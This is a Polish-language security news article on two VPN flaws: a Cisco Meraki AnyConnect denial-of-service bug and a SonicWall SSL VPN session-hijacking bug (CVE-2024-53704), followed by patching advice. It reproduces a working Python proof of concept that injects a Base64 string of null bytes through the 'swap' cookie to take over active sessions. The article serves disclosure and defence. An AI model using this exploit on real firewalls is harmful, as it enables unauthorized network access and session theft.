Dwie grube podatności w SonicWall Firewall oraz Cisco AnyConnect VPN. Można uzyskać nieautoryzowany dostęp do sieci i przeprowadzić DoS

Poniżej przedstawiamy szczegółowe informacje na temat każdej z nich.

Podatność w Cisco AnyConnect VPN (CVE-2025-20212)

Problem dotyczy urządzeń Cisco Meraki MX i serii Z obsługujących funkcję SSL VPN (AnyConnect). Luka (ocena CVSS 3.1 i 7.7 – wysoki poziom zagrożenia) umożliwia uwierzytelnionemu atakującemu manipulowanie atrybutami sesji SSL VPN w taki sposób, by doprowadzić do awarii procesu obsługującego połączenia VPN. Skutkiem jest wystąpienie stanu odmowy usługi (Denial of Service, DoS), co powoduje natychmiastowe przerwanie aktywnych sesji VPN oraz potencjalnie destabilizuje infrastrukturę sieciową organizacji.

Technicznie rzecz biorąc, atak wykorzystuje błąd w sposobie, w jaki system przetwarza zmodyfikowane żądania sesji SSL VPN. Może to prowadzić do nieoczekiwanych błędów w alokacji pamięci lub nieprawidłowego zarządzania zasobami, co ostatecznie skutkuje zamknięciem usługi VPN. Choć atak wymaga wcześniejszego uwierzytelnienia, jest on szczególnie niebezpieczny w środowiskach korporacyjnych, gdzie Cisco Meraki pełni kluczową rolę w zapewnianiu dostępu do zasobów sieciowych.

Dotknięte produkty

Urządzenia Cisco Meraki serii MX/Z z włączoną funkcją AnyConnect VPN:

• MX64/MX65 (tylko firmware ≥17.6),
• MX67/MX68/MX75/MX84/MX95/MX100/MX250,
• vMX.

Podatność w SonicWall Firewall (CVE-2024-53704)

Druga luka (z lutego) dotyczy firewalli SonicWall i jest znacznie bardziej niebezpieczna, ponieważ pozwala atakującym przejąć aktywne sesje SSL VPN bez potrzeby uwierzytelnienia. Jest exploitowana w środowisku sieciowym i ostrzega o niej organizacja CISA. Podatność może być wykorzystana przez atakującego do przejęcia uprawnień sesji zalogowanego użytkownika i uzyskania dostępu do zasobów sieciowych, tak jakby był on legalnym użytkownikiem.

Problem wynika z błędnego zarządzania sesjami uwierzytelniającymi w systemie SonicWall. Atakujący może przechwycić lub odtworzyć tokeny sesji, co skutkuje przejęciem połączenia. Możliwe jest także wykorzystanie metod ataku typu session hijacking (przejęcie sesji) lub token replay attacks, gdzie ponowne wysłanie odpowiednio spreparowanego tokena pozwala przejąć autoryzację użytkownika.

Podatność dotyczy urządzeń SonicWall:

• NSv,
• zapór sieciowych Gen6 (wersji starszych niż 6.5.5.1-6n) oraz Gen7,
• a także systemów SonicOS w wersjach 7.1.x (do 7.1.1-7058), 7.1.2-7019 i 8.0.0-8035.

Warunkiem przeprowadzenia ataku jest istnienie przynajmniej jednej aktywnej sesji SSL VPN. Ze względu na wysoki poziom zagrożenia (CVSS 3.1: 9.8 – krytyczny), administratorzy powinni niezwłocznie wdrożyć stosowne aktualizacje zabezpieczeń.

Eksploitacja luki – jest POC

Badacze z BishopFox wykazali, że zakodowanie 32 bajtów zerowych w formacie Base64 i ich wstrzyknięcie za pomocą pliku cookie swap pozwala na przejęcie pełnej kontroli nad aktywnymi sesjami. Opublikowany skrypt proof-of-concept w języku Python pokazuje, jak łatwe jest wykorzystanie tej podatności.

pythonimport base64, requests, urllib3, warnings
warnings.filterwarnings("ignore", category=urllib3.exceptions.InsecureRequestWarning)
payload = base64.b64encode(b"\x00" * 32).decode()
resp = requests.get(
  "https://192.168.50.189:4433/cgi-bin/sslvpnclient?launchplatform=",
  cookies={"swap": payload},
  verify=False
)
print(resp.headers)
print(resp.text)

Zalecenia dotyczące zabezpieczeń

Cisco i SonicWall natychmiast po wykryciu luk opublikowały stosowne poprawki i zalecają ich pilne wdrożenie.

Administratorzy powinni:

• Zaktualizować firmware na urządzeniach Cisco Meraki oraz SonicWall do najnowszych wersji, które zawierają poprawki bezpieczeństwa.
• Monitorować logi sieciowe pod kątem nieautoryzowanych prób połączeń oraz nietypowej aktywności związanej z sesjami VPN.
• Wprowadzić dodatkowe mechanizmy zabezpieczeń, takie jak uwierzytelnianie wieloskładnikowe (MFA) oraz ograniczenia dostępu do VPN na podstawie polityk sieciowych.
• Regularnie testować podatności w swojej infrastrukturze VPN i firewalli, aby minimalizować ryzyko wykorzystania nieznanych jeszcze luk bezpieczeństwa.

Obie podatności podkreślają znaczenie regularnych aktualizacji oraz aktywnego monitorowania bezpieczeństwa urządzeń sieciowych. W przypadku zaniechania działań naprawczych organizacje narażają się na ataki prowadzące do utraty dostępu do zasobów sieciowych oraz potencjalnych naruszeń danych.

Dodatkowe informacje o obu podatnościach znajdziecie tutaj (Cisco) i tutaj (SonicWall).